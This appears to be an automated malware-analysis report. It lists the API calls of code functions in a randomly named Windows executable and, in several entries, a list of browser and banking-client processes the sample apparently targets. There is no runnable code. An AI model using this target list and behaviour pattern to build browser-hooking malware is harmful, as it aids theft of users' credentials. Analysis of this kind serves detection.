    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008E78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_008E1900
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008D3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008D3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008D3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_008978A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_008978A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_008978A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_00896CA0
